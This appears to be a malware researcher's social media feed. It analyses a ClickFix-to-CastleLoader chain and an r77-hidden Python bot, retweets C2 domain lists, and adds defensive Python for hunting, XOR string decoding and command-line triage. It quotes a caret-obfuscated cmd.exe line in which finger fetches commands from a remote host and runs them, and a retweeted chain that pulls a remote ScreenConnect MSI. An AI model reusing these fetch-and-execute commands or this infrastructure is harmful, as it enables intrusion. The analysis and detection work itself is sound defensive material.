eKg_

43 posts

@eKg_sec

threat intel | malware | hunting | Opinions are mine and mine alone.

localhost · Joined April 2023
297 Following · 43 Followers
Pinned Tweet
eKg_ @eKg_sec
Apparent WordPress compromise of popular restaurant chain #TGIFridays observed with #clickfix infection chain delivering malicious MSI disguised as "Microsoft Endpoint DLP Module" TGIF? 👾 #malware #clickfix @executemalware

eKg_ @eKg_sec
> Strings/IOCs
> some initial strings.. new_bot, bot_id, bot_pass, campaign_id, bot_version, task_id, poll_and_execute, task_response
> sha256 04cb9f0bca6e0e4ed30bc92726590724bf60938440b3825252657d1b3af45495
> c2 public key/cluster id also captured
#malware #r77 #pyarmor

eKg_ @eKg_sec
> Communications
> bootstraps tor by downloading legit tor-expert-bundle from archive.torproject.org
> uses rsa2048 + AES-GCM session crypto with signed payload verification
> disables TLS certificate verification for every C2 request

eKg_ @eKg_sec
> Stage5
> unpacks PyArmor for the bot itself
> uses r77 userland rootkit to hide
> registers PID and config keys with r77's known interfaces so r77's hooks filter it out of Task Manager and registry enumeration
> c2 fallbacks > Tor > telegra[.]ph > rentry[.]org > HTTP > DGA

eKg_ @eKg_sec
> Stage4
> creates persistence through task scheduler 2.0, specifically through COM calls
> stores its config under HKCU\SOFTWARE\$77config, r77 rootkit namespace
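The Stage4 and Stage5 posts above describe the bot parking its config under the r77 `$77` namespace and registering with r77 so the rootkit's userland hooks filter it out of Task Manager and registry enumeration. The practical consequence for a hunter is that enumeration on the host is the wrong place to look. The following is an added example (not the sample's code and not r77's) that runs the prefix check over endpoint telemetry instead. It assumes r77's documented convention, that every process, file, directory, scheduled task, service, registry key and value whose name starts with `$77` is hidden by hooking enumeration APIs in injected processes, and that kernel-callback telemetry (Sysmon / EDR process, file and registry events) records those names before any hooked enumeration can filter them. The event lines are constructed for the example.

```python
"""Hunt for r77-style "$77" prefix hiding in endpoint telemetry.

Added example for the Stage4 / Stage5 posts. Not code from the analysed
sample and not r77's code. Assumption: names starting with "$77" are
hidden from enumeration inside hooked processes, so the check is run on
telemetry written by kernel callbacks rather than on `reg query` or
Task Manager output on the host. The events below are constructed.
"""
import json
import re

# "$77" must start a name: beginning of the value or right after a path
# separator, and the name ends at the next separator or whitespace.
# A "$77" in the middle of a token is not r77's convention and is ignored.
PREFIX_RE = re.compile(r"(?:^|[\\/])(\$77[^\\/\s]*)", re.IGNORECASE)

# Sysmon-style fields that carry a name r77 would hide, per event ID.
FIELDS_BY_EVENT = {
    1: ("Image", "CommandLine", "ParentImage"),   # process create
    7: ("ImageLoaded",),                          # image load
    11: ("TargetFilename",),                      # file create
    12: ("TargetObject",),                        # registry key create/delete
    13: ("TargetObject",),                        # registry value set
}

# Constructed sample telemetry (JSON, one event per line).
SAMPLE_LINES = [
    json.dumps({"EventID": 13,
                "Image": r"C:\Users\u\AppData\Local\Programs\Python\python.exe",
                "TargetObject": r"HKCU\SOFTWARE\$77config\pid\4120"}),
    json.dumps({"EventID": 1,
                "Image": r"C:\Users\u\AppData\Local\bot\$77svc.exe",
                "CommandLine": r"$77svc.exe --poll",
                "ParentImage": r"C:\Windows\System32\svchost.exe"}),
    json.dumps({"EventID": 11,
                "Image": r"C:\Windows\explorer.exe",
                "TargetFilename": r"C:\Users\u\Documents\report$77.docx"}),
    json.dumps({"EventID": 1,
                "Image": r"C:\Windows\System32\notepad.exe",
                "CommandLine": "notepad.exe",
                "ParentImage": r"C:\Windows\explorer.exe"}),
]


def hidden_names(event: dict) -> list:
    """Every "$77"-prefixed name in the fields r77 would hide for this event type."""
    names = []
    for field in FIELDS_BY_EVENT.get(event.get("EventID"), ()):
        names.extend(m.group(1) for m in PREFIX_RE.finditer(event.get(field, "")))
    return names


def hunt(lines) -> list:
    """Run the prefix check over JSON-lines telemetry; one finding per hit."""
    findings = []
    for line in lines:
        event = json.loads(line)
        for name in hidden_names(event):
            findings.append({"event_id": event["EventID"],
                             "image": event.get("Image"),
                             "hidden_name": name})
    return findings


def run_sample() -> list:
    """Findings for the constructed sample: the $77config write and the $77svc.exe process."""
    return hunt(SAMPLE_LINES)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The `report$77.docx` line is there on purpose: the prefix only counts at the start of a path component, so ordinary files with `$77` somewhere in the name do not fire. The same `PREFIX_RE` can be pointed at scheduled-task names and service names from whatever event source records them.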

eKg_ @eKg_sec
> Stage3
> BIN2 is a fake WiX installer, compiled 4 days before analysis and unsigned
> contains legit python 3.14 installer and an obfuscated python payload
> silent install of python, stages the bot under %LocalAppData%

eKg_ @eKg_sec
> Stage2
> program runs and starts a couple of threads
> (1) legit jdownloader installer
> (2) after ~8 minutes of sleep for evasion, drops BIN2 to start menu programs LNK path, runs, deletes file once complete

eKg_ @eKg_sec
> Stage1
> appears to be install4j but IAT is basically nothing, uses API hash resolution at runtime
> strings hidden behind a rolling XOR (dll names, mutexes, etc)
> 2 resources are used, legitimate installer (BIN1) and an encrypted inner launcher (BIN2)
> uses XOR key "ectb"
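The Stage1 post says the launcher hides its strings (DLL names, mutexes) behind a rolling XOR with the key "ectb". Below is an added example, not the sample's code, of the two things an analyst does with that information: decrypt a string table once the key is known, and recover the key from a known-plaintext crib (a DLL name that is bound to be in there) when it is not. Assumptions: "rolling XOR" is taken to mean byte `i` is XORed with `key[i mod 4]`, strings are NUL-terminated, and the key length of 4 comes from the post; the real sample's layout may differ. The encrypted blob is constructed here from a made-up string table, not extracted from the binary.

```python
"""Repeating-key XOR string decoder with known-plaintext key recovery.

Added example for the Stage1 post; not the sample's code. Assumptions:
byte i is XORed with key[i % len(key)], strings are NUL-terminated, key
length 4 as stated in the post. SAMPLE_PLAINTEXT / SAMPLE_BLOB are
constructed for the example.
"""

KEY = b"ectb"   # key named in the post


def xor_rolling(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the key byte at the same position mod key length."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_strings(blob: bytes, key: bytes) -> list:
    """Decrypt a blob of NUL-terminated strings and return them as text."""
    plain = xor_rolling(blob, key)
    return [s.decode("latin-1") for s in plain.split(b"\x00") if s]


def recover_key(cipher: bytes, crib: bytes, key_len: int):
    """Known-plaintext recovery of a repeating XOR key.

    Slides `crib` (a string the blob is expected to contain, e.g. a DLL
    name) across the ciphertext. At each offset the crib implies one key
    byte per position; because the crib is longer than the key, every key
    slot is implied more than once, and an offset is accepted only when
    all implications agree. The returned key is aligned to absolute
    offset 0 of the blob, so it works directly with xor_rolling().
    Returns (offset, key) or None when no offset is consistent.
    """
    if len(crib) < key_len:
        raise ValueError("crib must be at least as long as the key")
    for off in range(len(cipher) - len(crib) + 1):
        key = [None] * key_len
        consistent = True
        for i, p in enumerate(crib):
            pos = off + i
            implied = cipher[pos] ^ p
            slot = pos % key_len
            if key[slot] is None:
                key[slot] = implied
            elif key[slot] != implied:
                consistent = False
                break
        if consistent and None not in key:
            return off, bytes(key)
    return None


# Constructed sample: what a decrypted string table might look like.
SAMPLE_PLAINTEXT = b"kernel32.dll\x00ntdll.dll\x00Global\\sample_mutex\x00"
SAMPLE_BLOB = xor_rolling(SAMPLE_PLAINTEXT, KEY)


def demo():
    """Pretend the key is unknown: recover it from an 'ntdll.dll' crib, then decrypt."""
    off, key = recover_key(SAMPLE_BLOB, b"ntdll.dll", key_len=4)
    return off, key, decrypt_strings(SAMPLE_BLOB, key)


if __name__ == "__main__":
    print(demo())
```

A crib of 12 bytes against a 4-byte key checks every key slot three times, so a wrong offset is rejected almost immediately; short cribs (a 4- or 5-byte mutex fragment) give far weaker confirmation and should be followed by a printable-ratio check on the whole decrypted blob.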

eKg_ retweeted
V4bel @v4bel
💥 Introducing "Dirty Frag" A universal Linux LPE chaining two vulns in xfrm-ESP and RxRPC. A successor class to Dirty Pipe & Copy Fail. No race, no panic on failure, fully deterministic. ~9 years latent. Ubuntu / RHEL / Fedora / openSUSE / CentOS / AlmaLinux, and more. Even if you've applied the "Copy Fail" mitigation, your Linux is still vulnerable to "Dirty Frag". Apply the Dirty Frag mitigation. Details: dirtyfrag.io

eKg_ retweeted
fab0 @FABO97662188
#malware #cybersecurity #lumma
Fresh C2 domains used by LummaC2 infostealer:
boletukk[.]cyou
trotskxt[.]cyou
brechfo[.]cyou
cucumb[.]cyou
crapuhn[.]cyou
ditabop[.]cyou
codbsd[.]cyou
poxzxin[.]cyou
elgccyx[.]cyou
affimcm[.]cyou
springvc[.]cyou
psychozc[.]cyou
pashtu[.]cyou
1/3

eKg_ retweeted
Kostas @Kostastsale
What I’m seeing from these tflux RMM campaigns:
• ScreenConnect dropped
• Splashtop dropped
Chain I observed:
msiexec.exe → drops TiService.exe under Program Files → PowerShell launches msiexec.exe → pulls remote ScreenConnect MSI from hxxps://leoacadernytrust[.]co[.]uk → ScreenConnect.ClientService.exe executes through SCM → uses Guest / Access parameters → connects to vickynewsc[.]xyz:8041

Quoting James @James_inthe_box:
I new #rmm on me... #tiflux: app.any.run/tasks/775562f2… cc @nas_bench for maybe #lolrmm?

eKg_ retweeted
fab0 @FABO97662188
#malware #cybersecurity #phantompulse #macos
MacOS dropper of a tracked campaign named REF6598 that delivers the PhantomPulse RAT.
C2 servers:
pla7ina[.]cfd
0x666[.]info
honestly[.]ink
t[.]me/ax03bot -> acvgste[.]club
Campaign monitor. Check it out: clickfix.pro

eKg_ retweeted
Squiblydoo @SquiblydooBlog
Update to pkilab.certgraveyard.org
- I originally hadn't planned for the analysis reports to be sharable, but it turned out people liked sharing them. They are now permanent.
- Added P7X support, which was omitted by accident

eKg_ retweeted
John Hammond @_JohnHammond
i should probably add to the noise and earn internet points like everybody else screaming about copy dot fail or mini shai hulud or cpanel hacks or github rce or password manager pwnage or codex goblins or zomg ai or whatever else is ‼️🚨BREAKING🚨‼️today but i'm just tired man

eKg_ @eKg_sec
IOCs:
cheeshoumreciple.]com:79
38.146.25.]206
brionter.]com
46.183.25.]73
4c290cf00fae4d504b43ceef2842ebf3096ad1ba36189a9db7093d86fd7b9d28

eKg_ @eKg_sec
> Decrypted strings show functionality
> machine_id, access_key, access_kt, build_version, computer_name, launch_method, install_path, package_name, run_as_admin, wow64_bypass, send_finished_status, send_execution_status, make_screenshots, zip_executable_files, av_list, active_av

eKg_ @eKg_sec
> ClickFix -> CastleLoader -> CastleBot using Finger LOLBin
> Stage 1
"C:\WINDOWS\system32\cmd.exe" /c start "" /min for /f "skip=18 delims=" %T in ('f^^i^^n^^g^^e^^r NjoDPATzUB@cheeshoumreciple.]com') do %T & echo > 38.146.25.]206
#malware #clickfix #castleloader #castlebot
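The ClickFix stage quoted in the post above hides `finger` behind cmd.exe caret escapes and feeds the finger server's response line by line into `for /f`, where `do %T` runs each line as a command. The following is an added example, not CastleLoader's code, of how a detection would normalise and triage that command line: strip the carets (cmd.exe consumes a `^` as an escape for the next character, and the command string of a `for /f` loop is parsed a second time by a child cmd.exe, which is why the sample doubles every caret), locate the finger call, and rate it higher when its output is captured by `for /f` and the loop body starts with the loop variable. The sample command line is the one quoted in the post with the domain and IP left defanged as written; the benign lines are constructed.

```python
"""Normalise and triage a caret-obfuscated ClickFix command that abuses finger.exe.

Added example for the CastleLoader / CastleBot post; not CastleLoader's
code. The sample command line is the one quoted in the post (defanged as
written there); BENIGN_CMDLINES are constructed.
"""
import re

SAMPLE_CMDLINE = (
    r'"C:\WINDOWS\system32\cmd.exe" /c start "" /min for /f "skip=18 delims=" %T in '
    r"('f^^i^^n^^g^^e^^r NjoDPATzUB@cheeshoumreciple.]com') do %T & echo > 38.146.25.]206"
)

# Constructed benign lines: a plain command and a for /f loop over a
# harmless command, to show that neither is flagged.
BENIGN_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /c dir /b',
    r'''"C:\Windows\System32\cmd.exe" /c for /f "delims=" %i in ('ver') do @echo %i''',
]

# for /f ["options"] %var in ('command') do <body>
FOR_F_RE = re.compile(
    r"""for\s+/f\s+(?:"(?P<opts>[^"]*)"\s+)?%(?P<var>\w+)\s+in\s+\(\s*'(?P<cmd>[^']*)'\s*\)"""
    r"""\s+do\s+(?P<body>.*)""",
    re.IGNORECASE,
)
# finger [user]@host: the host ends at whitespace, a quote, a paren or a
# command separator so the closing ') of the for /f string is not swallowed.
FINGER_RE = re.compile(
    r"""\bfinger(?:\.exe)?\s+(?P<user>[^@\s]*)@(?P<host>[^\s'")&|]+)""", re.IGNORECASE
)


def strip_carets(cmdline: str) -> str:
    """Remove cmd.exe escape characters so obfuscated tokens read normally."""
    return cmdline.replace("^", "")


def triage(cmdline: str):
    """Return a finding for a finger-based loader, or None if finger is not involved.

    severity "medium": finger.exe is invoked at all (rare on modern hosts).
    severity "high":   its output is captured by for /f and the loop body
                       starts with the loop variable, i.e. every line the
                       remote finger server returns is run as a command.
    """
    norm = strip_carets(cmdline)
    finger = FINGER_RE.search(norm)
    if finger is None:
        return None
    finding = {
        "severity": "medium",
        "user": finger.group("user"),
        "host": finger.group("host"),
        "normalised": norm,
        "executes_output": False,
        "skipped_lines": 0,
    }
    loop = FOR_F_RE.search(norm)
    if loop and FINGER_RE.search(loop.group("cmd")):
        var = loop.group("var")
        body = loop.group("body").strip()
        executes = re.match(rf"%{re.escape(var)}\b", body) is not None
        skip = re.search(r"skip=(\d+)", loop.group("opts") or "", re.IGNORECASE)
        finding["executes_output"] = executes
        # skip=N drops the first N lines of the finger response (banner /
        # decoy text) before the rest is handed to the loop body.
        finding["skipped_lines"] = int(skip.group(1)) if skip else 0
        if executes:
            finding["severity"] = "high"
    return finding


if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
    print([triage(c) for c in BENIGN_CMDLINES])
```

Caret stripping is the only normalisation needed for this sample, but the same `triage()` applies unchanged to a command that was not obfuscated at all; the finger-into-for /f shape is the signal, not the carets.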